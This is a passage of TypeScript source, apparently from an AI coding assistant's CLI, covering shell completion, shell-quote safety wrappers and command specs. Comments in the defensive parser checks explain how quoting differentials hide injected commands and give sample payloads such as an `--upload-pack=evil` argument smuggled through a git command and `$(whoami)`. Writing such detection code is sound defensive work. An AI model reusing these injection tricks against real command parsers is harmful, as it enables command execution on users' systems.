if (!command || command.includes('/') || command.includes('\\')) return null
|
||||
if (command.includes('..')) return null
|
||||
if (command.startsWith('-') && command !== '-') return null
|
||||
|
||||
try {
|
||||
const module = await import(`@withfig/autocomplete/build/${command}.js`)
|
||||
return module.default || module
|
||||
} catch {
|
||||
return null
|
||||
}
|
||||
}
|
||||
export const getCommandSpec = memoizeWithLRU(
|
||||
async (command: string): Promise<CommandSpec | null> => {
|
||||
const spec =
|
||||
specs.find(s => s.name === command) ||
|
||||
(await loadFigSpec(command)) ||
|
||||
null
|
||||
return spec
|
||||
},
|
||||
(command: string) => command,
|
||||
)
|
||||
@@ -0,0 +1,259 @@
|
||||
import type { SuggestionItem } from 'src/components/PromptInput/PromptInputFooterSuggestions.js'
|
||||
import {
|
||||
type ParseEntry,
|
||||
quote,
|
||||
tryParseShellCommand,
|
||||
} from '../bash/shellQuote.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import { getShellType } from '../localInstaller.js'
|
||||
import * as Shell from '../Shell.js'
|
||||
|
||||
// Constants
|
||||
const MAX_SHELL_COMPLETIONS = 15
|
||||
const SHELL_COMPLETION_TIMEOUT_MS = 1000
|
||||
const COMMAND_OPERATORS = ['|', '||', '&&', ';'] as const
|
||||
|
||||
export type ShellCompletionType = 'command' | 'variable' | 'file'
|
||||
|
||||
type InputContext = {
|
||||
prefix: string
|
||||
completionType: ShellCompletionType
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if a parsed token is a command operator (|, ||, &&, ;)
|
||||
*/
|
||||
function isCommandOperator(token: ParseEntry): boolean {
|
||||
return (
|
||||
typeof token === 'object' &&
|
||||
token !== null &&
|
||||
'op' in token &&
|
||||
(COMMAND_OPERATORS as readonly string[]).includes(token.op as string)
|
||||
)
|
||||
}
|
||||
|
||||
/**
|
||||
* Determine completion type based solely on prefix characteristics
|
||||
*/
|
||||
function getCompletionTypeFromPrefix(prefix: string): ShellCompletionType {
|
||||
if (prefix.startsWith('$')) {
|
||||
return 'variable'
|
||||
}
|
||||
if (
|
||||
prefix.includes('/') ||
|
||||
prefix.startsWith('~') ||
|
||||
prefix.startsWith('.')
|
||||
) {
|
||||
return 'file'
|
||||
}
|
||||
return 'command'
|
||||
}
|
||||
|
||||
/**
|
||||
* Find the last string token and its index in parsed tokens
|
||||
*/
|
||||
function findLastStringToken(
|
||||
tokens: ParseEntry[],
|
||||
): { token: string; index: number } | null {
|
||||
const i = tokens.findLastIndex(t => typeof t === 'string')
|
||||
return i !== -1 ? { token: tokens[i] as string, index: i } : null
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if we're in a context that expects a new command
|
||||
* (at start of input or after a command operator)
|
||||
*/
|
||||
function isNewCommandContext(
|
||||
tokens: ParseEntry[],
|
||||
currentTokenIndex: number,
|
||||
): boolean {
|
||||
if (currentTokenIndex === 0) {
|
||||
return true
|
||||
}
|
||||
const prevToken = tokens[currentTokenIndex - 1]
|
||||
return prevToken !== undefined && isCommandOperator(prevToken)
|
||||
}
|
||||
|
||||
/**
|
||||
* Parse input to extract completion context
|
||||
*/
|
||||
function parseInputContext(input: string, cursorOffset: number): InputContext {
|
||||
const beforeCursor = input.slice(0, cursorOffset)
|
||||
|
||||
// Check if it's a variable prefix, before expanding with shell-quote
|
||||
const varMatch = beforeCursor.match(/\$[a-zA-Z_][a-zA-Z0-9_]*$/)
|
||||
if (varMatch) {
|
||||
return { prefix: varMatch[0], completionType: 'variable' }
|
||||
}
|
||||
|
||||
// Parse with shell-quote
|
||||
const parseResult = tryParseShellCommand(beforeCursor)
|
||||
if (!parseResult.success) {
|
||||
// Fallback to simple parsing
|
||||
const tokens = beforeCursor.split(/\s+/)
|
||||
const prefix = tokens[tokens.length - 1] || ''
|
||||
const isFirstToken = tokens.length === 1 && !beforeCursor.includes(' ')
|
||||
const completionType = isFirstToken
|
||||
? 'command'
|
||||
: getCompletionTypeFromPrefix(prefix)
|
||||
return { prefix, completionType }
|
||||
}
|
||||
|
||||
// Extract current token
|
||||
const lastToken = findLastStringToken(parseResult.tokens)
|
||||
if (!lastToken) {
|
||||
// No string token found - check if after operator
|
||||
const lastParsedToken = parseResult.tokens[parseResult.tokens.length - 1]
|
||||
const completionType =
|
||||
lastParsedToken && isCommandOperator(lastParsedToken)
|
||||
? 'command'
|
||||
: 'command' // Default to command at start
|
||||
return { prefix: '', completionType }
|
||||
}
|
||||
|
||||
// If there's a trailing space, the user is starting a new argument
|
||||
if (beforeCursor.endsWith(' ')) {
|
||||
// After first token (command) with space = file argument expected
|
||||
return { prefix: '', completionType: 'file' }
|
||||
}
|
||||
|
||||
// Determine completion type from context
|
||||
const baseType = getCompletionTypeFromPrefix(lastToken.token)
|
||||
|
||||
// If it's clearly a file or variable based on prefix, use that type
|
||||
if (baseType === 'variable' || baseType === 'file') {
|
||||
return { prefix: lastToken.token, completionType: baseType }
|
||||
}
|
||||
|
||||
// For command-like tokens, check context: are we starting a new command?
|
||||
const completionType = isNewCommandContext(
|
||||
parseResult.tokens,
|
||||
lastToken.index,
|
||||
)
|
||||
? 'command'
|
||||
: 'file' // Not after operator = file argument
|
||||
|
||||
return { prefix: lastToken.token, completionType }
|
||||
}
|
||||
|
||||
/**
|
||||
* Generate bash completion command using compgen
|
||||
*/
|
||||
function getBashCompletionCommand(
|
||||
prefix: string,
|
||||
completionType: ShellCompletionType,
|
||||
): string {
|
||||
if (completionType === 'variable') {
|
||||
// Variable completion - remove $ prefix
|
||||
const varName = prefix.slice(1)
|
||||
return `compgen -v ${quote([varName])} 2>/dev/null`
|
||||
} else if (completionType === 'file') {
|
||||
// File completion with trailing slash for directories and trailing space for files
|
||||
// Use 'while read' to prevent command injection from filenames containing newlines
|
||||
return `compgen -f ${quote([prefix])} 2>/dev/null | head -${MAX_SHELL_COMPLETIONS} | while IFS= read -r f; do [ -d "$f" ] && echo "$f/" || echo "$f "; done`
|
||||
} else {
|
||||
// Command completion
|
||||
return `compgen -c ${quote([prefix])} 2>/dev/null`
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Generate zsh completion command using native zsh commands
|
||||
*/
|
||||
function getZshCompletionCommand(
|
||||
prefix: string,
|
||||
completionType: ShellCompletionType,
|
||||
): string {
|
||||
if (completionType === 'variable') {
|
||||
// Variable completion - use zsh pattern matching for safe filtering
|
||||
const varName = prefix.slice(1)
|
||||
return `print -rl -- \${(k)parameters[(I)${quote([varName])}*]} 2>/dev/null`
|
||||
} else if (completionType === 'file') {
|
||||
// File completion with trailing slash for directories and trailing space for files
|
||||
// Note: zsh glob expansion is safe from command injection (unlike bash for-in loops)
|
||||
return `for f in ${quote([prefix])}*(N[1,${MAX_SHELL_COMPLETIONS}]); do [[ -d "$f" ]] && echo "$f/" || echo "$f "; done`
|
||||
} else {
|
||||
// Command completion - use zsh pattern matching for safe filtering
|
||||
return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Get completions for the given shell type
|
||||
*/
|
||||
async function getCompletionsForShell(
|
||||
shellType: 'bash' | 'zsh',
|
||||
prefix: string,
|
||||
completionType: ShellCompletionType,
|
||||
abortSignal: AbortSignal,
|
||||
): Promise<SuggestionItem[]> {
|
||||
let command: string
|
||||
|
||||
if (shellType === 'bash') {
|
||||
command = getBashCompletionCommand(prefix, completionType)
|
||||
} else if (shellType === 'zsh') {
|
||||
command = getZshCompletionCommand(prefix, completionType)
|
||||
} else {
|
||||
// Unsupported shell type
|
||||
return []
|
||||
}
|
||||
|
||||
const shellCommand = await Shell.exec(command, abortSignal, 'bash', {
|
||||
timeout: SHELL_COMPLETION_TIMEOUT_MS,
|
||||
})
|
||||
const result = await shellCommand.result
|
||||
return result.stdout
|
||||
.split('\n')
|
||||
.filter((line: string) => line.trim())
|
||||
.slice(0, MAX_SHELL_COMPLETIONS)
|
||||
.map((text: string) => ({
|
||||
id: text,
|
||||
displayText: text,
|
||||
description: undefined,
|
||||
metadata: { completionType },
|
||||
}))
|
||||
}
|
||||
|
||||
/**
|
||||
* Get shell completions for the given input
|
||||
* Supports bash and zsh shells (matches Shell.ts execution support)
|
||||
*/
|
||||
export async function getShellCompletions(
|
||||
input: string,
|
||||
cursorOffset: number,
|
||||
abortSignal: AbortSignal,
|
||||
): Promise<SuggestionItem[]> {
|
||||
const shellType = getShellType()
|
||||
|
||||
// Only support bash/zsh (matches Shell.ts execution support)
|
||||
if (shellType !== 'bash' && shellType !== 'zsh') {
|
||||
return []
|
||||
}
|
||||
|
||||
try {
|
||||
const { prefix, completionType } = parseInputContext(input, cursorOffset)
|
||||
|
||||
if (!prefix) {
|
||||
return []
|
||||
}
|
||||
|
||||
const completions = await getCompletionsForShell(
|
||||
shellType,
|
||||
prefix,
|
||||
completionType,
|
||||
abortSignal,
|
||||
)
|
||||
|
||||
// Add inputSnapshot to all suggestions so we can detect when input changes
|
||||
return completions.map(suggestion => ({
|
||||
...suggestion,
|
||||
metadata: {
|
||||
...(suggestion.metadata as { completionType: ShellCompletionType }),
|
||||
inputSnapshot: input,
|
||||
},
|
||||
}))
|
||||
} catch (error) {
|
||||
logForDebugging(`Shell completion failed: ${error}`)
|
||||
return [] // Silent fail
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,28 @@
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
/**
|
||||
* Parses a shell prefix that may contain an executable path and arguments.
|
||||
*
|
||||
* Examples:
|
||||
* - "bash" -> quotes as 'bash'
|
||||
* - "/usr/bin/bash -c" -> quotes as '/usr/bin/bash' -c
|
||||
* - "C:\Program Files\Git\bin\bash.exe -c" -> quotes as 'C:\Program Files\Git\bin\bash.exe' -c
|
||||
*
|
||||
* @param prefix The shell prefix string containing executable and optional arguments
|
||||
* @param command The command to be executed
|
||||
* @returns The properly formatted command string with quoted components
|
||||
*/
|
||||
export function formatShellPrefixCommand(
|
||||
prefix: string,
|
||||
command: string,
|
||||
): string {
|
||||
// Split on the last space before a dash to separate executable from arguments
|
||||
const spaceBeforeDash = prefix.lastIndexOf(' -')
|
||||
if (spaceBeforeDash > 0) {
|
||||
const execPath = prefix.substring(0, spaceBeforeDash)
|
||||
const args = prefix.substring(spaceBeforeDash + 1)
|
||||
return `${quote([execPath])} ${args} ${quote([command])}`
|
||||
} else {
|
||||
return `${quote([prefix])} ${quote([command])}`
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,304 @@
|
||||
/**
|
||||
* Safe wrappers for shell-quote library functions that handle errors gracefully
|
||||
* These are drop-in replacements for the original functions
|
||||
*/
|
||||
|
||||
import {
|
||||
type ParseEntry,
|
||||
parse as shellQuoteParse,
|
||||
quote as shellQuoteQuote,
|
||||
} from 'shell-quote'
|
||||
import { logError } from '../log.js'
|
||||
import { jsonStringify } from '../slowOperations.js'
|
||||
|
||||
export type { ParseEntry } from 'shell-quote'
|
||||
|
||||
export type ShellParseResult =
|
||||
| { success: true; tokens: ParseEntry[] }
|
||||
| { success: false; error: string }
|
||||
|
||||
export type ShellQuoteResult =
|
||||
| { success: true; quoted: string }
|
||||
| { success: false; error: string }
|
||||
|
||||
export function tryParseShellCommand(
|
||||
cmd: string,
|
||||
env?:
|
||||
| Record<string, string | undefined>
|
||||
| ((key: string) => string | undefined),
|
||||
): ShellParseResult {
|
||||
try {
|
||||
const tokens =
|
||||
typeof env === 'function'
|
||||
? shellQuoteParse(cmd, env)
|
||||
: shellQuoteParse(cmd, env)
|
||||
return { success: true, tokens }
|
||||
} catch (error) {
|
||||
if (error instanceof Error) {
|
||||
logError(error)
|
||||
}
|
||||
return {
|
||||
success: false,
|
||||
error: error instanceof Error ? error.message : 'Unknown parse error',
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
|
||||
try {
|
||||
const validated: string[] = args.map((arg, index) => {
|
||||
if (arg === null || arg === undefined) {
|
||||
return String(arg)
|
||||
}
|
||||
|
||||
const type = typeof arg
|
||||
|
||||
if (type === 'string') {
|
||||
return arg as string
|
||||
}
|
||||
if (type === 'number' || type === 'boolean') {
|
||||
return String(arg)
|
||||
}
|
||||
|
||||
if (type === 'object') {
|
||||
throw new Error(
|
||||
`Cannot quote argument at index ${index}: object values are not supported`,
|
||||
)
|
||||
}
|
||||
if (type === 'symbol') {
|
||||
throw new Error(
|
||||
`Cannot quote argument at index ${index}: symbol values are not supported`,
|
||||
)
|
||||
}
|
||||
if (type === 'function') {
|
||||
throw new Error(
|
||||
`Cannot quote argument at index ${index}: function values are not supported`,
|
||||
)
|
||||
}
|
||||
|
||||
throw new Error(
|
||||
`Cannot quote argument at index ${index}: unsupported type ${type}`,
|
||||
)
|
||||
})
|
||||
|
||||
const quoted = shellQuoteQuote(validated)
|
||||
return { success: true, quoted }
|
||||
} catch (error) {
|
||||
if (error instanceof Error) {
|
||||
logError(error)
|
||||
}
|
||||
return {
|
||||
success: false,
|
||||
error: error instanceof Error ? error.message : 'Unknown quote error',
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if parsed tokens contain malformed entries that suggest shell-quote
|
||||
* misinterpreted the command. This happens when input contains ambiguous
|
||||
* patterns (like JSON-like strings with semicolons) that shell-quote parses
|
||||
* according to shell rules, producing token fragments.
|
||||
*
|
||||
* For example, `echo {"hi":"hi;evil"}` gets parsed with `;` as an operator,
|
||||
* producing tokens like `{hi:"hi` (unbalanced brace). Legitimate commands
|
||||
* produce complete, balanced tokens.
|
||||
*
|
||||
* Also detects unterminated quotes in the original command: shell-quote
|
||||
* silently drops an unmatched `"` or `'` and parses the rest as unquoted,
|
||||
* leaving no trace in the tokens. `echo "hi;evil | cat` (one unmatched `"`)
|
||||
* is a bash syntax error, but shell-quote yields clean tokens with `;` as
|
||||
* an operator. The token-level checks below can't catch this, so we walk
|
||||
* the original command with bash quote semantics and flag odd parity.
|
||||
*
|
||||
* Security: This prevents command injection via HackerOne #3482049 where
|
||||
* shell-quote's correct parsing of ambiguous input can be exploited.
|
||||
*/
|
||||
export function hasMalformedTokens(
|
||||
command: string,
|
||||
parsed: ParseEntry[],
|
||||
): boolean {
|
||||
// Check for unterminated quotes in the original command. shell-quote drops
|
||||
// an unmatched quote without leaving any trace in the tokens, so this must
|
||||
// inspect the raw string. Walk with bash semantics: backslash escapes the
|
||||
// next char outside single-quotes; no escapes inside single-quotes.
|
||||
let inSingle = false
|
||||
let inDouble = false
|
||||
let doubleCount = 0
|
||||
let singleCount = 0
|
||||
for (let i = 0; i < command.length; i++) {
|
||||
const c = command[i]
|
||||
if (c === '\\' && !inSingle) {
|
||||
i++
|
||||
continue
|
||||
}
|
||||
if (c === '"' && !inSingle) {
|
||||
doubleCount++
|
||||
inDouble = !inDouble
|
||||
} else if (c === "'" && !inDouble) {
|
||||
singleCount++
|
||||
inSingle = !inSingle
|
||||
}
|
||||
}
|
||||
if (doubleCount % 2 !== 0 || singleCount % 2 !== 0) return true
|
||||
|
||||
for (const entry of parsed) {
|
||||
if (typeof entry !== 'string') continue
|
||||
|
||||
// Check for unbalanced curly braces
|
||||
const openBraces = (entry.match(/{/g) || []).length
|
||||
const closeBraces = (entry.match(/}/g) || []).length
|
||||
if (openBraces !== closeBraces) return true
|
||||
|
||||
// Check for unbalanced parentheses
|
||||
const openParens = (entry.match(/\(/g) || []).length
|
||||
const closeParens = (entry.match(/\)/g) || []).length
|
||||
if (openParens !== closeParens) return true
|
||||
|
||||
// Check for unbalanced square brackets
|
||||
const openBrackets = (entry.match(/\[/g) || []).length
|
||||
const closeBrackets = (entry.match(/\]/g) || []).length
|
||||
if (openBrackets !== closeBrackets) return true
|
||||
|
||||
// Check for unbalanced double quotes
|
||||
// Count quotes that aren't escaped (preceded by backslash)
|
||||
// A token with an odd number of unescaped quotes is malformed
|
||||
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
|
||||
const doubleQuotes = entry.match(/(?<!\\)"/g) || []
|
||||
if (doubleQuotes.length % 2 !== 0) return true
|
||||
|
||||
// Check for unbalanced single quotes
|
||||
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
|
||||
const singleQuotes = entry.match(/(?<!\\)'/g) || []
|
||||
if (singleQuotes.length % 2 !== 0) return true
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
/**
|
||||
* Detects commands containing '\' patterns that exploit the shell-quote library's
|
||||
* incorrect handling of backslashes inside single quotes.
|
||||
*
|
||||
* In bash, single quotes preserve ALL characters literally - backslash has no
|
||||
* special meaning. So '\' is just the string \ (the quote opens, contains \,
|
||||
* and the next ' closes it). But shell-quote incorrectly treats \ as an escape
|
||||
* character inside single quotes, causing '\' to NOT close the quoted string.
|
||||
*
|
||||
* This means the pattern '\' <payload> '\' hides <payload> from security checks
|
||||
* because shell-quote thinks it's all one single-quoted string.
|
||||
*/
|
||||
export function hasShellQuoteSingleQuoteBug(command: string): boolean {
|
||||
// Walk the command with correct bash single-quote semantics
|
||||
let inSingleQuote = false
|
||||
let inDoubleQuote = false
|
||||
|
||||
for (let i = 0; i < command.length; i++) {
|
||||
const char = command[i]
|
||||
|
||||
// Handle backslash escaping outside of single quotes
|
||||
if (char === '\\' && !inSingleQuote) {
|
||||
// Skip the next character (it's escaped)
|
||||
i++
|
||||
continue
|
||||
}
|
||||
|
||||
if (char === '"' && !inSingleQuote) {
|
||||
inDoubleQuote = !inDoubleQuote
|
||||
continue
|
||||
}
|
||||
|
||||
if (char === "'" && !inDoubleQuote) {
|
||||
inSingleQuote = !inSingleQuote
|
||||
|
||||
// Check if we just closed a single quote and the content ends with
|
||||
// trailing backslashes. shell-quote's chunker regex '((\\'|[^'])*?)'
|
||||
// incorrectly treats \' as an escape sequence inside single quotes,
|
||||
// while bash treats backslash as literal. This creates a differential
|
||||
// where shell-quote merges tokens that bash treats as separate.
|
||||
//
|
||||
// Odd trailing \'s = always a bug:
|
||||
// '\' -> shell-quote: \' = literal ', still open. bash: \, closed.
|
||||
// 'abc\' -> shell-quote: abc then \' = literal ', still open. bash: abc\, closed.
|
||||
// '\\\' -> shell-quote: \\ + \', still open. bash: \\\, closed.
|
||||
//
|
||||
// Even trailing \'s = bug ONLY when a later ' exists in the command:
|
||||
// '\\' alone -> shell-quote backtracks, both parsers agree string closes. OK.
|
||||
// '\\' 'next' -> shell-quote: \' consumes the closing ', finds next ' as
|
||||
// false close, merges tokens. bash: two separate tokens.
|
||||
//
|
||||
// Detail: the regex alternation tries \' before [^']. For '\\', it matches
|
||||
// the first \ via [^'] (next char is \, not '), then the second \ via \'
|
||||
// (next char IS '). This consumes the closing '. The regex continues reading
|
||||
// until it finds another ' to close the match. If none exists, it backtracks
|
||||
// to [^'] for the second \ and closes correctly. If a later ' exists (e.g.,
|
||||
// the opener of the next single-quoted arg), no backtracking occurs and
|
||||
// tokens merge. See H1 report: git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
|
||||
// shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
|
||||
// bash: ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
|
||||
if (!inSingleQuote) {
|
||||
let backslashCount = 0
|
||||
let j = i - 1
|
||||
while (j >= 0 && command[j] === '\\') {
|
||||
backslashCount++
|
||||
j--
|
||||
}
|
||||
if (backslashCount > 0 && backslashCount % 2 === 1) {
|
||||
return true
|
||||
}
|
||||
// Even trailing backslashes: only a bug when a later ' exists that
|
||||
// the chunker regex can use as a false closing quote. We check for
|
||||
// ANY later ' because the regex doesn't respect bash quote state
|
||||
// (e.g., a ' inside double quotes is also consumable).
|
||||
if (
|
||||
backslashCount > 0 &&
|
||||
backslashCount % 2 === 0 &&
|
||||
command.indexOf("'", i + 1) !== -1
|
||||
) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
continue
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
export function quote(args: ReadonlyArray<unknown>): string {
|
||||
// First try the strict validation
|
||||
const result = tryQuoteShellArgs([...args])
|
||||
|
||||
if (result.success) {
|
||||
return result.quoted
|
||||
}
|
||||
|
||||
// If strict validation failed, use lenient fallback
|
||||
// This handles objects, symbols, functions, etc. by converting them to strings
|
||||
try {
|
||||
const stringArgs = args.map(arg => {
|
||||
if (arg === null || arg === undefined) {
|
||||
return String(arg)
|
||||
}
|
||||
|
||||
const type = typeof arg
|
||||
|
||||
if (type === 'string' || type === 'number' || type === 'boolean') {
|
||||
return String(arg)
|
||||
}
|
||||
|
||||
// For unsupported types, use JSON.stringify as a safe fallback
|
||||
// This ensures we don't crash but still get a meaningful representation
|
||||
return jsonStringify(arg)
|
||||
})
|
||||
|
||||
return shellQuoteQuote(stringArgs)
|
||||
} catch (error) {
|
||||
// SECURITY: Never use JSON.stringify as a fallback for shell quoting.
|
||||
// JSON.stringify uses double quotes which don't prevent shell command execution.
|
||||
// For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
|
||||
if (error instanceof Error) {
|
||||
logError(error)
|
||||
}
|
||||
throw new Error('Failed to quote shell arguments safely')
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,128 @@
|
||||
import { quote } from './shellQuote.js'
|
||||
|
||||
/**
|
||||
* Detects if a command contains a heredoc pattern
|
||||
* Matches patterns like: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF, etc.
|
||||
*/
|
||||
function containsHeredoc(command: string): boolean {
|
||||
// Match heredoc patterns: << followed by optional -, then optional quotes or backslash, then word
|
||||
// Matches: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF
|
||||
// Check for bit-shift operators first and exclude them
|
||||
if (
|
||||
/\d\s*<<\s*\d/.test(command) ||
|
||||
/\[\[\s*\d+\s*<<\s*\d+\s*\]\]/.test(command) ||
|
||||
/\$\(\(.*<<.*\)\)/.test(command)
|
||||
) {
|
||||
return false
|
||||
}
|
||||
|
||||
// Now check for heredoc patterns
|
||||
const heredocRegex = /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/
|
||||
return heredocRegex.test(command)
|
||||
}
|
||||
|
||||
/**
|
||||
* Detects if a command contains multiline strings in quotes
|
||||
*/
|
||||
function containsMultilineString(command: string): boolean {
|
||||
// Check for strings with actual newlines in them
|
||||
// Handle escaped quotes by using a more sophisticated pattern
|
||||
// Match single quotes: '...\n...' where content can include escaped quotes \'
|
||||
// Match double quotes: "...\n..." where content can include escaped quotes \"
|
||||
const singleQuoteMultiline = /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/
|
||||
const doubleQuoteMultiline = /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/
|
||||
|
||||
return (
|
||||
singleQuoteMultiline.test(command) || doubleQuoteMultiline.test(command)
|
||||
)
|
||||
}
|
||||
|
||||
/**
|
||||
* Quotes a shell command appropriately, preserving heredocs and multiline strings
|
||||
* @param command The command to quote
|
||||
* @param addStdinRedirect Whether to add < /dev/null
|
||||
* @returns The properly quoted command
|
||||
*/
|
||||
export function quoteShellCommand(
|
||||
command: string,
|
||||
addStdinRedirect: boolean = true,
|
||||
): string {
|
||||
// If command contains heredoc or multiline strings, handle specially
|
||||
// The shell-quote library incorrectly escapes ! to \! in these cases
|
||||
if (containsHeredoc(command) || containsMultilineString(command)) {
|
||||
// For heredocs and multiline strings, we need to quote for eval
|
||||
// but avoid shell-quote's aggressive escaping
|
||||
// We'll use single quotes and escape only single quotes in the command
|
||||
const escaped = command.replace(/'/g, "'\"'\"'")
|
||||
const quoted = `'${escaped}'`
|
||||
|
||||
// Don't add stdin redirect for heredocs as they provide their own input
|
||||
if (containsHeredoc(command)) {
|
||||
return quoted
|
||||
}
|
||||
|
||||
// For multiline strings without heredocs, add stdin redirect if needed
|
||||
return addStdinRedirect ? `${quoted} < /dev/null` : quoted
|
||||
}
|
||||
|
||||
// For regular commands, use shell-quote
|
||||
if (addStdinRedirect) {
|
||||
return quote([command, '<', '/dev/null'])
|
||||
}
|
||||
|
||||
return quote([command])
|
||||
}
|
||||
|
||||
/**
|
||||
* Detects if a command already has a stdin redirect
|
||||
* Match patterns like: < file, </path/to/file, < /dev/null, etc.
|
||||
* But not <<EOF (heredoc), << (bit shift), or <(process substitution)
|
||||
*/
|
||||
export function hasStdinRedirect(command: string): boolean {
|
||||
// Look for < followed by whitespace and a filename/path
|
||||
// Negative lookahead to exclude: <<, <(
|
||||
// Must be preceded by whitespace or command separator or start of string
|
||||
return /(?:^|[\s;&|])<(?![<(])\s*\S+/.test(command)
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if stdin redirect should be added to a command
|
||||
* @param command The command to check
|
||||
* @returns true if stdin redirect can be safely added
|
||||
*/
|
||||
export function shouldAddStdinRedirect(command: string): boolean {
|
||||
// Don't add stdin redirect for heredocs as it interferes with the heredoc terminator
|
||||
if (containsHeredoc(command)) {
|
||||
return false
|
||||
}
|
||||
|
||||
// Don't add stdin redirect if command already has one
|
||||
if (hasStdinRedirect(command)) {
|
||||
return false
|
||||
}
|
||||
|
||||
// For other commands, stdin redirect is generally safe
|
||||
return true
|
||||
}
|
||||
|
||||
/**
|
||||
* Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
|
||||
*
|
||||
* The model occasionally hallucinates Windows CMD syntax (e.g., `ls 2>nul`)
|
||||
* even though our bash shell is always POSIX (Git Bash / WSL on Windows).
|
||||
* When Git Bash sees `2>nul`, it creates a literal file named `nul` — a
|
||||
* Windows reserved device name that is extremely hard to delete and breaks
|
||||
* `git add .` and `git clone`. See anthropics/claude-code#4928.
|
||||
*
|
||||
* Matches: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (case-insensitive)
|
||||
* Does NOT match: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`
|
||||
*
|
||||
* Limitation: this regex does not parse shell quoting, so `echo ">nul"`
|
||||
* will also be rewritten. This is acceptable collateral — it's extremely
|
||||
* rare and rewriting to `/dev/null` inside a string is harmless.
|
||||
*/
|
||||
const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g
|
||||
|
||||
export function rewriteWindowsNullRedirect(command: string): string {
|
||||
return command.replace(NUL_REDIRECT_REGEX, '$1/dev/null')
|
||||
}
|
||||
@@ -0,0 +1,14 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const alias: CommandSpec = {
|
||||
name: 'alias',
|
||||
description: 'Create or list command aliases',
|
||||
args: {
|
||||
name: 'definition',
|
||||
description: 'Alias definition in the form name=value',
|
||||
isOptional: true,
|
||||
isVariadic: true,
|
||||
},
|
||||
}
|
||||
|
||||
export default alias
|
||||
@@ -0,0 +1,18 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
import alias from './alias.js'
|
||||
import nohup from './nohup.js'
|
||||
import pyright from './pyright.js'
|
||||
import sleep from './sleep.js'
|
||||
import srun from './srun.js'
|
||||
import time from './time.js'
|
||||
import timeout from './timeout.js'
|
||||
|
||||
export default [
|
||||
pyright,
|
||||
timeout,
|
||||
sleep,
|
||||
alias,
|
||||
nohup,
|
||||
time,
|
||||
srun,
|
||||
] satisfies CommandSpec[]
|
||||
@@ -0,0 +1,13 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
const nohup: CommandSpec = {
|
||||
name: 'nohup',
|
||||
description: 'Run a command immune to hangups',
|
||||
args: {
|
||||
name: 'command',
|
||||
description: 'Command to run with nohup',
|
||||
isCommand: true,
|
||||
},
|
||||
}
|
||||
|
||||
export default nohup
|
||||
@@ -0,0 +1,91 @@
|
||||
import type { CommandSpec } from '../registry.js'
|
||||
|
||||
export default {
|
||||
name: 'pyright',
|
||||
description: 'Type checker for Python',
|
||||
options: [
|
||||
{ name: ['--help', '-h'], description: 'Show help message' },
|
||||
{ name: '--version', description: 'Print pyright version and exit' },
|
||||
{
|
||||
name: ['--watch', '-w'],
|
||||
description: 'Continue to run and watch for changes',
|
||||
},
|
||||
{
|
||||
name: ['--project', '-p'],
|
||||
description: 'Use the configuration file at this location',
|
||||
args: { name: 'FILE OR DIRECTORY' },
|
||||
},
|
||||
{ name: '-', description: 'Read file or directory list from stdin' },
|
||||
{
|
||||
name: '--createstub',
|
||||
description: 'Create type stub file(s) for import',
|
||||
args: { name: 'IMPORT' },
|
||||
},
|
||||
{
|
||||
name: ['--typeshedpath', '-t'],
|
||||
description: 'Use typeshed type stubs at this location',
|
||||
args: { name: 'DIRECTORY' },
|
||||
},
|
||||
{
|
||||
name: '--verifytypes',
|
||||
description: 'Verify completeness of types in py.typed package',
|
||||
args: { name: 'IMPORT' },
|
||||
},
|
||||
{
|
||||
name: '--ignoreexternal',
|
||||
description: 'Ignore external imports for --verifytypes',
|
||||
},
|
||||
{
|
||||
name: '--pythonpath',
|
||||
description: 'Path to the Python interpreter',
|
||||
args: { name: 'FILE' },
|
||||
},
|
||||
{
|
||||
name: '--pythonplatform',
|
||||
description: 'Analyze for platform',
|
||||
args: { name: 'PLATFORM' },
|
||||
},
|
||||
{
|
||||
name: '--pythonversion',
|
||||
description: 'Analyze for Python version',
|
||||
args: { name: 'VERSION' },
|
||||
},
|
||||
{
|
||||
name: ['--venvpath', '-v'],
|
||||
description: 'Directory that contains virtual environments',
|
||||
args: { name: 'DIRECTORY' },
|
||||
},
|
||||
{ name: '--outputjson', description: 'Output results in JSON format' },
|
||||
{ name: '--verbose', description: 'Emit verbose diagnostics' },
|
||||
{ name: '--stats', description: 'Print detailed performance stats' },
|
||||
{
|
||||
name: '--dependencies',
|
||||
description: 'Emit import dependency information',
|
||||
},
|
||||
{
|
||||
